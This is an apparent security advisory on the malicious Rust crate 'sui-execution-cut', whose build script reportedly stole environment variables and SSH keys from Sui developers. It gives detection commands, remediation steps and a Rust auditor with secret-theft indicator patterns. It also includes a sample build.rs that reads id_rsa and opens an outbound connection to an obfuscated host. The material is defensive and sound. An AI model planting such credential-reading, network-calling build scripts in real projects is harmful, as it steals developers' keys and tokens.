Sui (cratesio), Malicious Code (Supply Chain), CVE-2026-XXXX (Pending) – Critical

The `sui-execution-cut` crate is a classic software supply chain attack that abuses Rust's build script mechanism. When a crate that ships a `build.rs` is pulled in as a dependency, Cargo compiles and runs that script before compiling the crate itself, on whatever machine performs the build: a developer's workstation or a CI/CD runner. In this case the published `build.rs` contained hidden malicious instructions, which ran as soon as `cargo build` (or any Cargo command that compiles dependencies, such as `cargo check` or `cargo test`) was invoked. No user interaction beyond normal dependency resolution was required.

The script was written to collect sensitive data from the build environment: environment variables, SSH keys, and files under the `$HOME` directory. After gathering that information it opened an outbound connection to a command-and-control (C2) server. Exfiltration most likely used standard protocols such as HTTP or HTTPS to blend in with legitimate traffic, and the communication may have been obfuscated to evade network detection.

The payload was tailored to developers of the Sui blockchain framework. By posing as a legitimate execution-layer helper for Sui, the crate stood a better chance of being added to a project. The malicious version (0.0.0-0) was published on 2026-04-20 and remained available for three days before being reported. The crate has since been removed from crates.io, but any project that fetched the package during that window should be treated as potentially compromised.

DailyCVE Form

Platform: crates.io (cargo)
Version: 0.0.0-0
Vulnerability : Malicious Build Script
Severity: Critical
Date: 2026-05-04

Prediction: Removal/Crate yanked (2026-04-23)

Analytics

What Undercode Say:

Scan Cargo.lock for the malicious crate (anchor the pattern so that a longer crate name does not also match):
grep -nE '^name = "sui-execution-cut"$' Cargo.lock
Check whether the build script was ever compiled and run (Cargo keeps a per-crate build directory whose "output" file is written when the script runs; its timestamp shows when):
ls -ld target/*/build/sui-execution-cut-*/ target/*/build/sui-execution-cut-*/output
Retrieve the cached source of the build script for analysis (preserve a copy as evidence before deleting anything):
cat ~/.cargo/registry/src/*/sui-execution-cut-*/build.rs
Query the crates.io API for crate details (the API requires a User-Agent header; curl sends one by default):
curl -s https://crates.io/api/v1/crates/sui-execution-cut
Monitor outbound connections during a build. The report does not publish the C2 host, so capture every new outbound TCP connection from the builder rather than filtering on a name, and narrow to 'host <c2-host> and port 443' once an indicator is published:
sudo tcpdump -i any -n 'tcp[tcpflags] & (tcp-syn|tcp-ack) == tcp-syn'

Exploit:

The attack has no prerequisite beyond the attacker controlling the crate's `build.rs`. Once the victim runs `cargo build` (or any Cargo command that compiles the dependency, such as `cargo check` or `cargo test`), the script executes with the user's privileges. It reads the process environment and `~/.ssh/id_rsa`, then posts the collected data to a remote server with a plain web request. The code is hidden under several layers of string obfuscation so that simple pattern matching over the crate source does not flag it.
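The checks listed under "What Undercode Say" and the obfuscation point above can be turned into a small auditor. The following program is an added example written for this page, not code from the report, from Undercode, or from the Sui project. It parses Cargo.lock `[[package]]` blocks so that only the exact crate name matches (a plain grep also hits longer names), locates every cached copy of the crate's `build.rs` under the Cargo registry source directory (assumed layout: `~/.cargo/registry/src/<index>/<name>-<version>/build.rs`), and flags build-script behaviours that have no place in a legitimate script: environment dumps, SSH key reads, home-directory lookups, network connections, process spawning, and strings assembled from decoders or long runs of hex escapes. The indicator list is illustrative and is not a signature of the actual payload; the embedded lockfile fragment and the two build.rs bodies are constructed test inputs, and the "suspicious" one is only shaped like the behaviour the report describes.

```rust
// Added example (not code from the report or the Sui project). Standard library
// only: `rustc auditor.rs && ./auditor Cargo.lock sui-execution-cut ~/.cargo/registry/src`
use std::fs;
use std::path::{Path, PathBuf};

/// Return the quoted value of `key = "..."` if `line` is such an assignment.
fn quoted_value<'a>(line: &'a str, key: &str) -> Option<&'a str> {
    let rest = line.trim().strip_prefix(key)?.trim_start().strip_prefix('=')?.trim_start().strip_prefix('"')?;
    rest.find('"').map(|end| &rest[..end])
}

/// Parse every `[[package]]` block of a Cargo.lock into (name, version) pairs.
/// Unlike a plain grep this matches the exact name, so `sui-execution-cut-utils` cannot match.
pub fn parse_lockfile(lock: &str) -> Vec<(String, String)> {
    let mut packages = Vec::new();
    let (mut name, mut version): (Option<String>, Option<String>) = (None, None);
    // The trailing sentinel flushes the final block.
    for line in lock.lines().chain(std::iter::once("[[package]]")) {
        if line.trim() == "[[package]]" {
            if let (Some(n), Some(v)) = (name.take(), version.take()) {
                packages.push((n, v));
            }
        } else if let Some(v) = quoted_value(line, "name") {
            name = Some(v.to_string());
        } else if let Some(v) = quoted_value(line, "version") {
            version = Some(v.to_string());
        }
    }
    packages
}

/// Every version of `crate_name` pinned in the lockfile (there may be several).
pub fn locked_versions<'a>(packages: &'a [(String, String)], crate_name: &str) -> Vec<&'a str> {
    packages.iter().filter(|(n, _)| n.as_str() == crate_name).map(|(_, v)| v.as_str()).collect()
}

/// Behaviours a build script has no business showing, with source substrings that hint at them.
/// Assumption: illustrative, not a signature of the real payload; a hit is a lead, not a verdict.
const INDICATORS: &[(&str, &[&str])] = &[
    ("dumps environment variables", &["env::vars"]),
    ("reads SSH key material", &[".ssh", "id_rsa", "id_ed25519"]),
    ("resolves the home directory", &["\"HOME\"", "home_dir"]),
    ("opens a network connection", &["std::net", "TcpStream", "reqwest", "ureq"]),
    ("spawns a process", &["Command::new"]),
    ("decodes assembled strings", &["from_utf8", "base64", "decode("]),
];

/// Flag suspicious behaviours in one build.rs source text.
pub fn scan_build_script(src: &str) -> Vec<&'static str> {
    let mut hits: Vec<&'static str> = INDICATORS
        .iter()
        .filter(|(_, needles)| needles.iter().any(|n| src.contains(*n)))
        .map(|(label, _)| *label)
        .collect();
    // Many "\x.." escapes in one file suggest strings assembled to dodge grep.
    if src.matches("\\x").count() >= 8 {
        hits.push("embeds hex-escaped string literals");
    }
    hits
}

/// build.rs of every cached copy of `crate_name` under a registry source directory such as
/// `~/.cargo/registry/src/<index>/` (assumed layout: `<name>-<version>/build.rs`).
pub fn cached_build_scripts(registry_src: &Path, crate_name: &str) -> Vec<PathBuf> {
    let Ok(indexes) = fs::read_dir(registry_src) else { return Vec::new() };
    indexes
        .flatten()
        .filter_map(|index| fs::read_dir(index.path()).ok())
        .flatten()
        .flatten()
        .filter(|dir| {
            // Require "<name>-<digit...>" so a longer crate name does not match.
            dir.file_name().to_string_lossy().strip_prefix(crate_name)
                .and_then(|rest| rest.strip_prefix('-'))
                .map_or(false, |ver| ver.starts_with(|c: char| c.is_ascii_digit()))
        })
        .map(|dir| dir.path().join("build.rs"))
        .filter(|build| build.is_file())
        .collect()
}

/// Constructed Cargo.lock fragment and build.rs bodies for the demo; the second script is
/// shaped like the behaviour the report describes, it is not the actual payload.
pub const SAMPLE_LOCK: &str = "version = 3\n\n[[package]]\nname = \"serde\"\nversion = \"1.0.200\"\n\n[[package]]\nname = \"sui-execution-cut\"\nversion = \"0.0.0-0\"\nsource = \"registry+https://github.com/rust-lang/crates.io-index\"\ndependencies = [\n \"serde\",\n]\n";
pub const BENIGN_BUILD: &str = r#"fn main() {
    println!("cargo:rerun-if-changed=wrapper.h");
    let out_dir = std::env::var("OUT_DIR").unwrap();
}"#;
pub const SUSPICIOUS_BUILD: &str = r#"fn main() {
    let env: Vec<(String, String)> = std::env::vars().collect();
    let key = std::fs::read(format!("{}/.ssh/id_rsa", std::env::var("HOME").unwrap()));
    let host = String::from_utf8(b"\x31\x30\x2e\x30\x2e\x30\x2e\x31".to_vec()).unwrap();
    let _ = std::net::TcpStream::connect((host.as_str(), 443u16));
}"#;

fn main() {
    let args: Vec<String> = std::env::args().collect();
    let [_, lock_path, crate_name, rest @ ..] = args.as_slice() else {
        eprintln!("usage: auditor <Cargo.lock> <crate-name> [registry-src-dir]");
        std::process::exit(2);
    };
    let packages = parse_lockfile(&fs::read_to_string(lock_path).expect("read Cargo.lock"));
    println!("{crate_name}: locked versions {:?}", locked_versions(&packages, crate_name));
    for build in rest.first().map_or(Vec::new(), |d| cached_build_scripts(Path::new(d), crate_name)) {
        println!("{}: {:?}", build.display(), scan_build_script(&fs::read_to_string(&build).unwrap_or_default()));
    }
}
```

Run it against every workspace and every builder that may have resolved the crate, not only the repository where it was first noticed: the lockfile tells you whether the crate was ever pinned, the registry cache tells you whether its source was ever downloaded to that machine, and the indicator scan is a triage aid for reading the retrieved `build.rs` by hand. A benign bindgen-style script yields no hits; the constructed suspicious script trips the environment, SSH, home-directory, network, decoder and hex-escape checks.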

Protection:

  1. Remove the dependency: delete `sui-execution-cut = "0.0.0-0"` from Cargo.toml, and check every workspace member and transitive dependency that might pull it back in.
  2. Regenerate the lock file: run `cargo update` (or delete and regenerate Cargo.lock) so the crate no longer appears there. This does not remove the downloaded source; preserve a copy for forensics, then delete `~/.cargo/registry/src/*/sui-execution-cut-*` and `~/.cargo/registry/cache/*/sui-execution-cut-*.crate` to get the payload off disk.
  3. Audit dependencies: run `cargo audit` against the RustSec advisory database, which carries advisories for crates reported as malicious as well as vulnerable ones, and consider `cargo vet` so that new dependencies require review before they build.
  4. Sandbox builds: run `cargo build` inside a container with no network access, or wrap build scripts with `cargo build-wrap`, so that a build script cannot reach a C2 server or read files outside the build tree.
  5. Block C2 infrastructure: once indicators are published (this report does not include the C2 address), add them to firewall and proxy blocklists; a blocklist alone does not stop a script that is updated to use a different host.
  6. Rotate credentials: treat every environment variable, SSH key and token present on any machine that built the crate as compromised and rotate them, including CI/CD tokens, crates.io and GitHub credentials, and any wallet keys.

Impact:

A successful compromise results in the theft of all environment variables (including CI/CD tokens and API keys), private SSH keys, and potentially source code from the development environment. With those credentials the attacker can take over the developer's GitHub and crates.io accounts, publish further malicious crate versions under a trusted name, and drain any blockchain wallets whose keys were present in the build process.

Sources:

Reported By: github.com
Extra Source Hub:
Undercode
